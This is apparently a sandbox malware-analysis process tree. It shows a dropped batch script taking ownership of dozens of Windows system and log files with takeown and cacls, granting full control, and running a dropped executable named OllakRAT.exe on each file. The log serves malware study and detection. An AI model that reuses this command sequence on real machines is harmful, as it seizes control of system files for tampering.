- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5608
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5640
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:304
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:5712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Executes dropped EXE
    PID:1636
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3804
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:6032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4596
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:5320
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:5972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    - Executes dropped EXE
    PID:5332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:5460
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:3868
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3176
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4452
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2296
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:5536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    PID:3668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5496
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5448
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:5768
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:5680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:5608
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:288
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:5440
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4076
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4820
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:5240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:5384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    - Executes dropped EXE
    PID:4036
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4044
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:5916
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    PID:3932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1832
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:5972
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  - Executes dropped EXE
  PID:5144
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    - Executes dropped EXE
    PID:5940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:840
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:3096
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:5660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:5584
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:4432
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f227201b-4092-454e-9f66-7709a83ee190.1.etl""
  2⤵
  PID:3668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f227201b-4092-454e-9f66-7709a83ee190.1.etl" /E /G Admin:F /C
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f227201b-4092-454e-9f66-7709a83ee190.1.etl"
    3⤵
    PID:5708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "UpdateSessionOrchestration.f227201b-4092-454e-9f66-7709a83ee190.1.etl" -nobanner
    3⤵
    PID:5308
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "UpdateSessionOrchestration.f227201b-4092-454e-9f66-7709a83ee190.1.etl" -nobanner
      4⤵
      PID:1864
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.2e7c001d-c36d-467a-993f-e8a7ae93a208.1.etl""
  2⤵
  PID:3792
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Executes dropped EXE
    PID:272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.2e7c001d-c36d-467a-993f-e8a7ae93a208.1.etl" /E /G Admin:F /C
    3⤵
    PID:5936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.2e7c001d-c36d-467a-993f-e8a7ae93a208.1.etl"
    3⤵
    PID:4124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "MoUsoCoreWorker.2e7c001d-c36d-467a-993f-e8a7ae93a208.1.etl" -nobanner
    3⤵
    PID:5780
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "MoUsoCoreWorker.2e7c001d-c36d-467a-993f-e8a7ae93a208.1.etl" -nobanner
      4⤵
      PID:5840
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.02bb9d36-869d-4ff4-8e18-be9767b5c208.1.etl""
  2⤵
  PID:4008
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.02bb9d36-869d-4ff4-8e18-be9767b5c208.1.etl" /E /G Admin:F /C
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.02bb9d36-869d-4ff4-8e18-be9767b5c208.1.etl"
    3⤵
    PID:5428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "WuProvider.02bb9d36-869d-4ff4-8e18-be9767b5c208.1.etl" -nobanner
    3⤵
    PID:5260
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "WuProvider.02bb9d36-869d-4ff4-8e18-be9767b5c208.1.etl" -nobanner
      4⤵
      PID:5712
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:412
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:4032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Executes dropped EXE
    PID:5320
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:3768
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:5752
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Executes dropped EXE
    PID:3868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:5824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3876
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:6004
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.66a48044-fbaa-4404-814f-3d55d2ecb0d9.1.etl""
  2⤵
  PID:5108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.66a48044-fbaa-4404-814f-3d55d2ecb0d9.1.etl" /E /G Admin:F /C
    3⤵
    PID:3752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.66a48044-fbaa-4404-814f-3d55d2ecb0d9.1.etl"
    3⤵
    - Modifies file permissions
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "MoUsoCoreWorker.66a48044-fbaa-4404-814f-3d55d2ecb0d9.1.etl" -nobanner
    3⤵
    PID:5700
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "MoUsoCoreWorker.66a48044-fbaa-4404-814f-3d55d2ecb0d9.1.etl" -nobanner
      4⤵
      PID:5132
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.80508b25-c1e2-4cf2-a19c-f2377a8d1da0.1.etl""
  2⤵
  PID:4136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.80508b25-c1e2-4cf2-a19c-f2377a8d1da0.1.etl" /E /G Admin:F /C
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.80508b25-c1e2-4cf2-a19c-f2377a8d1da0.1.etl"
    3⤵
    - Modifies file permissions
    PID:420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "WuProvider.80508b25-c1e2-4cf2-a19c-f2377a8d1da0.1.etl" -nobanner
    3⤵
    PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "WuProvider.80508b25-c1e2-4cf2-a19c-f2377a8d1da0.1.etl" -nobanner
      4⤵
      PID:4448
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:5852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:4904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:4328
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:5872
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:5788
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    PID:3668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5088
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:3980
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5436
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:5444
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.ba7e8f66-c106-4e21-960c-9e4a132f45df.1.etl""
  2⤵
  PID:288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.ba7e8f66-c106-4e21-960c-9e4a132f45df.1.etl" /E /G Admin:F /C
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.ba7e8f66-c106-4e21-960c-9e4a132f45df.1.etl"
    3⤵
    - Modifies file permissions
    PID:5364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "NotificationUxBroker.ba7e8f66-c106-4e21-960c-9e4a132f45df.1.etl" -nobanner
    3⤵
    PID:2536
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "NotificationUxBroker.ba7e8f66-c106-4e21-960c-9e4a132f45df.1.etl" -nobanner
      4⤵
      PID:5420
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:3780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5360
